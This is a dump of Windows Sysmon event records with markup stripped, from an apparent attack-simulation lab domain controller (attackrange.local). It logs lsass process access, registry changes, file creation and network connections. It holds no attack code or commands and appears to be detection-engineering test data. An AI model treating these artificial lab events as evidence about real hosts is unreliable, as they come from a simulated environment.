-EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-6444-6064-36DE-120000000000}0x12de360HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-62DD-6064-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.108{266CAFBE-641B-6064-3202-00000000AD01}5032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A6C93EF11B43F8A31C4600397CBFF244,SHA256=2FE2E98A7E44C6FEE8F32C20338A7C17B993D186FAE65A8FB8A67CF29FEFE5BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.804{266CAFBE-62C7-6064-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.6446.128.24.64.dynamic.cablesurf.de53837-false10.0.1.14win-dc-892.attackrange.local5986- 354300x8000000000000000858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.602{266CAFBE-6410-6064-DF01-00000000AD01}5080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local65326-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.583{266CAFBE-6410-6064-DF01-00000000AD01}5080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local65325-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.749{266CAFBE-62C7-6064-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.6446.128.24.64.dynamic.cablesurf.de53836-false10.0.1.14win-dc-892.attackrange.local5986- 23542300x8000000000000000968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:05.460{266CAFBE-62DD-6064-1200-00000000AD01}1268NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4523B49C392D2CDA6C170D4F2584C9EF,SHA256=645BF4E35F65927C479015F178C3A45AC2B9559FDB52D4B9652451C963C1A752,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:05.460{266CAFBE-62DD-6064-1200-00000000AD01}1268NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=45834993BD0C5907E0C5CDE025B44D95,SHA256=6C04030E0C8FF335147076716CCA99EF3234AAAE14F2A4146591C3BF6B786C6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:05.460{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:05.460{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:05.460{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x8000000000000000963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:05.460{266CAFBE-62C7-6064-0100-00000000AD01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\NextInstanceDWORD (0x0000001e) 13241300x8000000000000000962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:05.460{266CAFBE-62C7-6064-0100-00000000AD01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\CountDWORD (0x0000001e) 12241200x8000000000000000961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:00:05.460{266CAFBE-62C7-6064-0100-00000000AD01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\30 13241300x8000000000000000960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:05.460{266CAFBE-62C7-6064-0100-00000000AD01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:05.460{266CAFBE-62C7-6064-0100-00000000AD01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\CountDWORD (0x00000001) 12241200x8000000000000000958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:00:05.460{266CAFBE-62C7-6064-0100-00000000AD01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\1 13241300x8000000000000000957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:05.425{266CAFBE-62DD-6064-1300-00000000AD01}1276C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollTimeRemainingBinary Data 13241300x8000000000000000956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:05.425{266CAFBE-62DD-6064-1300-00000000AD01}1276C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollTimeRemainingBinary Data 13241300x8000000000000000955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:05.426{266CAFBE-62DD-6064-1000-00000000AD01}1144C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Winmgmt\Parameters\ServiceDllUnloadOnStopDWORD (0x00000000) 10341000x8000000000000000954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:05.014{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:05.014{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:05.014{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.998{266CAFBE-642D-6064-9002-00000000AD01}4580NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.blfMD5=7564C9B3687156E3882453F6D8B316F7,SHA256=79A0467E4D6419EF766D96D6B4FDC16CB8ACCAA26D58D22A43CCE0B256619838,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.998{266CAFBE-642D-6064-9002-00000000AD01}4580NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.2.regtrans-msMD5=B6D81B360A5672D80C27430F39153E2C,SHA256=30E14955EBF1352266DC2FF8067E68104607E750ABB9D3B36582B8AF909FCB58,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 13241300x80000000000000001379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.799{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000001378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.799{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000000) 13241300x80000000000000001377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.799{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 10341000x80000000000000001376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.393{266CAFBE-646E-6064-2100-00000000AE01}24682488C:\Windows\system32\conhost.exe{266CAFBE-646E-6064-2000-00000000AE01}2456C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.393{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Schedule\FailureActionsBinary Data 10341000x80000000000000001374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.377{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646E-6064-2100-00000000AE01}2468C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.377{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-646E-6064-2000-00000000AE01}2456C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.377{266CAFBE-646C-6064-1000-00000000AE01}11242420C:\Windows\system32\svchost.exe{266CAFBE-646E-6064-2000-00000000AE01}2456C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000001369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.315{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeC:\Windows\System32\wbem\Repository\WRITABLE.TST2021-03-31 12:00:46.315 10341000x80000000000000001368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.252{266CAFBE-646E-6064-1E00-00000000AE01}23322404C:\Windows\system32\conhost.exe{266CAFBE-646E-6064-1A00-00000000AE01}2284C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 